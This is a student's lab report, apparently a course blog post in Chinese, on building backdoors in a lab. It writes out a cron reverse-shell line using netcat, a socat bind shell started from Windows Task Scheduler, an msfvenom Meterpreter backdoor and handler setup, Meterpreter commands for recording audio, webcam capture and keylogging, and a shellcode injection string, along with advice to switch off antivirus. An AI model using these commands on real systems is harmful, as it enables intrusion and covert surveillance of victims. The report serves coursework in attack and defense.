# 20232321 2025-2026-1 《网络与系统攻防技术》实验二实验报告

1.实验内容

(1)使用netcat获取主机操作Shell,通过cron启动某项任务
(2)使用socat获取主机操作Shell, 通过任务计划启动
(3)使用MSF meterpreter生成后门程序,利用ncat或socat传送到主机并运行获取主机Shell
(4)在实验内容(3)获取的主机的基础上获取其音频、摄像头、击键记录等后门
(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

2.实验过程

(1)使用netcat获取主机操作Shell,通过cron启动某项任务

先在windows下监听kali的5314端口

屏幕截图 2025-10-15 092144

在kali下使用crontab -e编译周期性可执行文件,并使用crontab -l查看是否编译成功

#编译周期性可执行文件的命令(37是因为当时是9点10分做实验,我决定在第12分钟的时候执行命令)
5 * * * * /bin/netcat 192.168.31.32 5314 -e /bin/sh

屏幕截图 2025-10-15 092154

屏幕截图 2025-10-13 113549

(2)使用socat获取主机操作Shell, 通过任务计划启动

打开任务计划程序,新建基本任务,在新建的基本任务下新建一个触发器,如下配置

屏幕截图 2025-10-15 095013

屏幕截图 2025-10-15 095116

在新建的基本任务下新建操作,如下配置操作->程序或脚本 中选择我的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5314 exec:cmd.exe,pty,stderr这个命令将cmd.exe绑定到端口5314。

屏幕截图 2025-10-15 095442

配置完成后运行该基本任务

屏幕截图 2025-10-15 095814

屏幕截图 2025-10-15 100016

(3)使用MSF meterpreter生成后门程序,利用ncat或socat传送到主机并运行获取主机Shell

完成准备工作——生成可执行的后门文件20232321_backdoor.exe,并通过ncat传送到主机,如图所示已将后门程序传到主机。

#生成可执行的后门文件  LHOST是kali的ip  
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.83.133 LPORT=5215 -f exe > 20232321_backdoor.exe

屏幕截图 2025-10-14 194543

#在kali界面开启nc
nc -l 5215 <20232321_backdoor.exe

屏幕截图 2025-10-14 200106

#在主机开启nc
ncat.exe -l 5215 >20232321_backdoor.exe

屏幕截图 2025-10-14 195413

屏幕截图 2025-10-14 195729

准备工作完成后配置msfconsole,

#启动msfconsole
msfconsole
#启动handler
use exploit/multi/handler
#设置路径
set set payload windows/meterpreter/reverse_tcp
#设置ip
set LHOST 192.168.83.133
#设置端口
set LPORT 5215

屏幕截图 2025-10-14 194722

启动exploit,并双击启动后门程序,后门程序成功运行我们可以再kali虚拟机获取主机的Shell

屏幕截图 2025-10-14 200738

(4)在实验内容(3)获取的主机的基础上获取其音频、摄像头、击键记录等后门

使用record_mic指令获取音频:

#录制主机的音频
record_mic

屏幕截图 2025-10-15 075454

使用webcam_snap指令获取摄像头拍照后门:

#通过主机的摄像头拍摄
webcam_snap

屏幕截图 2025-10-15 080137

屏幕截图 2025-10-15 075738

使用webcam_stream指令可以获取摄像头录像后门:

#通过主机的摄像头拍摄
webcam_stream

屏幕截图 2025-10-15 080143

屏幕截图 2025-10-15 075846

使用keyscan_start和keyscan_dump指令获取击键记录的后门:

#获取击键的过程
keyscan_start
#读取击键的记录
keyscan_dump

屏幕截图 2025-10-15 080215

(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

首先去https://www.exploit-db.com/shellcodes 下载一个shellcode编码,该编码将决定我们之后meterpreter观测的ip与端口。我选择的是2018-05-14的编码。
屏幕截图 2025-10-14 120948(1)

在下载完成后,我打开下载的.c文件,可以找到以下两条语句,图一将0xfeffff80和0xffffffff进行异或操作可以得到 0x0100007f,转换为ip地址要先反过来看就是7f000001,即ip地址为127.0.0.1,端口号为4444,图二是我们之后要注入的shellcode

屏幕截图 2025-10-14 185850

屏幕截图 2025-10-14 185856

然后我们需要找到终端开始的地址。就复刻第一次实验的第3小问(寻找地址的shellcode可以用第一次实验的shellcode注入,不一定要使用刚刚找到的),我就使用实验一的shellcode找到现在开始的地址为0xffffcf4c+0x00000004=0xffffcf50

屏幕截图 2025-10-14 190811

屏幕截图 2025-10-14 190830

屏幕截图 2025-10-14 190850

将找到的开始地址添加在找到的shellcode地址前,

#实际的注入代码为  找到的开始地址+找到的shellcode
perl -e 'print "A" x 32;printf "\x50\xcf\xff\xff\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"'>input_20232321

准备工作完成后配置msfconsole,

#启动msfconsole
msfconsole
#启动handler
use exploit/multi/handler
#设置路径
set payload linux/x86/shell_reverse_tcp
#设置ip
set LHOST 127.0.0.1  
#设置端口
set LPORT 4444 

屏幕截图 2025-10-14 191710

最后启动exploit监测并运行pwn20232321,

#启动exploit
exploit
#启动程序
(cat input_20232321;cat) | ./pwn20232321

屏幕截图 2025-10-14 191635

屏幕截图 2025-10-14 192312

3.问题及解决方案

  • 问题1:在完成实验三时运行后门文件一直显示不能执行。如下图

屏幕截图 2025-10-13 161810

  • 问题1解决方案:并不是电脑的版本原因,主要有两个可能第一个生成的后门文件有问题,应该如下图的齿轮形状,如果不是齿轮形状可能生成的指令有问题。,(可以直接拖拽到主机,ncat传输好像不如直接拖拽)第二关闭防火墙,360安全管家,杀毒软件(注意一定要彻底关闭,并不是关闭他的某个应用)。

屏幕截图 2025-10-15 152425

  • 问题2:在完成实验三时,后门程序可以运行了但连接一直显示Died。如下图。

屏幕截图 2025-10-13 155633

  • 问题2解决方案:和 Ruby 的版本有关系,不兼容,更新metasploit得到最新的ruby
  sudo apt update
  sudo apt update && sudo apt install metasploit-framework

4.学习感悟、思考等

本次实验不仅是一次技术实践,更是一次网络安全思维的重塑。本次实验实现了我对网络攻防技术从理解到操作的突破,也让我意识到了网络安全漏洞的危害。后门程序的低成本与高危害的特性让人不寒而栗,系统合法的操作——周期操作cron和任务计划却可以被反过来利用成“安全漏洞”。在实验中仅需一行msfvenom命令就能生成后门,而 Meterpreter 的“record_mic”“webcam_snap” 等指令,能轻松窃取音频、图像等隐私信息,keyscan_dump甚至能获取账号密码等敏感数据。我们将来身为网络空间安全工作的最前线人员,最重要的就是坚持道德操守,其次就是不断地学习日新月异的网络安全知识。

5.问题回答

  • (1)例举你能想到的一个后门进入到你系统中的可能方式?

    可能通过木马软件,后门程序,钓鱼网站,虚假短信,像木马软件中攻击者可以让我的主机悄悄的向某个攻击主机A发送nc,socat连接,在主机A中设置nc -l -p +端口号 进行监听,通过反弹连接上我的主机。像让后门程序隐藏在某个正常的程序中,并让我的主机悄悄运行后门程序,从而入侵我的主机。

  • (2)例举你知道的后门如何启动起来(win及linux)的方式?

    linux可以通过cron特定时间启动,win可以通过任务计划特定操作启动

  • (3)Meterpreter有哪些给你映像深刻的功能?

    首先他只需要攻击者自己的ip和端口就可以依此设计后门文件,在其他主机运行后门文件后他可以获得我们主机的shell。这个操作条件非常低,他不需要像cron和任务计划需要特定主机的ip和端口,所以他可以广撒网,只要在一个主机上悄悄运行,就可以触发获取SHELL。而且它获取的权限还不低,像获取目标主机音频、摄像头、击键记录。

  • (4)如何发现自己有系统有没有被安装后门?
    下载 杀毒与恶意软件扫描工具,像360等。在任务管理器中查看陌生的进程。

参考资料

posted @ 2025-10-15 16:55  20232321罗乙又  阅读(63)  评论(0)    收藏  举报